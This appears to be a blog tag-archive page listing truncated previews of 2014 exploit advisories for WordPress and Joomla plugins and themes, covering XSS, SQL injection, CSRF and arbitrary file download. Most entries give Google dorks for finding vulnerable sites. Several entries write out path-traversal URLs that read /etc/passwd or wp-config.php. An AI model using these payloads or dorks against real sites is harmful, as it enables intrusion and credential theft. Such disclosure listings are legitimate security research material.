Tags archives: security

 

0

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

WP Photo Album Plus Security Vulnerabilities   Author: Milhouse Download: https://wordpress.org/plugins/wp-photo-album-plus/ Home Page: http://wppa.opajaap.nl/ Google dork: inurl:wp-content/plugins/wp-photo-album-plus   Set up: Wordpress Version: 3.9.1, 3.9.2 WP Photo Album Plus version: 5.4.4, 5.4.3 Client browsers: FireFox 31, Internet Explorer 8-11   Issue number 1: A Cross-Site Scripting (reflective) vulnerability. Details: The plugin echoes the value of the [...]

 

0

Joomla Spider Form Maker 4.3 SQL Injection

######################   # Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection   # Exploit Author : Claudio Viviani   # Vendor Homepage : http://web-dorado.com/   # Software Link : http://web-dorado.com/products/joomla-form.html   # Dork Google: inurl:com_formmaker     # Date : 2014-09-07   # Tested on : Windows 7 / Mozilla Firefox # Linux [...]

 

0

WordPress Plugin Vulnerability Dump – Part 2

More vulnerabilities in poorly coded plugins for y’all.   Ninja Forms v2.77 – Authorization bypass (regular users can delete forms, etc) Contact Form v3.83 – Email header injection WP to Twitter v2.9.3 – Authorization bypass (regular users can tweet to the admin’s twitter account) Xhanch – My Twitter v2.7.7 – CSRF (create and delete tweets) [...]

 

0

WordPress Spider Facebook 1.0.8 SQL Injection

###################### # Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection   # Exploit Author : Claudio Viviani   # Vendor Homepage : http://web-dorado.com/   # Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip   # Date : 2014-08-25   # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap [...]

 

0

WordPress Like Dislike Counter 1.2.3 SQL Injection

################################################################################################# # # Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability # Risk : High+/Critical # Exploit Author : XroGuE # Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php # Plugin Version : 1.2.3 # Plugin Name : Like Dislike Counter # Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip # Vendor Home : www.wpfruits.com # Date : [...]

 

0

WordPress Bulk Delete Users By Email 1.0 CSRF

# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 – CSRF # Google Dork: N/A # Date: 05.09.2014 # Exploit Author: Fikri Fadzil – fikri.fadzil@impact-alliance.org # Vendor Homepage – http://www.speakdigital.co.uk/ # Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/ # Version: 1.0 # Tested on: PHP     Description: This plugin will allow administrator to delete user(s) account [...]

 

0

WordPress Urban City Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress urban city Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/urbancity | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : https://churchthemes.net/themes/urban-city/ | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/urbancity/lib/scripts/download.php?file=/etc/passwd | |————————————————————————-| |[*] Proof: | [...]

 

0

WordPress Epic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress epic theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/epic | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.organizedthemes.com/epic | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/epic/includes/download.php?file=/etc/passwd | |————————————————————————-| |[*] Proof: | [...]

 

0

WordPress Authentic Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress Authentic Theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/authentic | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.organizedthemes.com/authentic-theme | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php | |————————————————————————-| |[*] Proof: | [...]

 

0

WordPress Antioch Arbitrary File Download

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |————————————————————————-| |[*] Exploit Title: Wordpress Antioch Theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/antioch | |[*] Date : Date: 2014-09-07 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://churchthemes.net/themes/antioch | |[*] Tested on: Windows 7 | |————————————————————————-| | |[*] Location : [localhost]/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php | |————————————————————————-| |[*] Proof: | [...]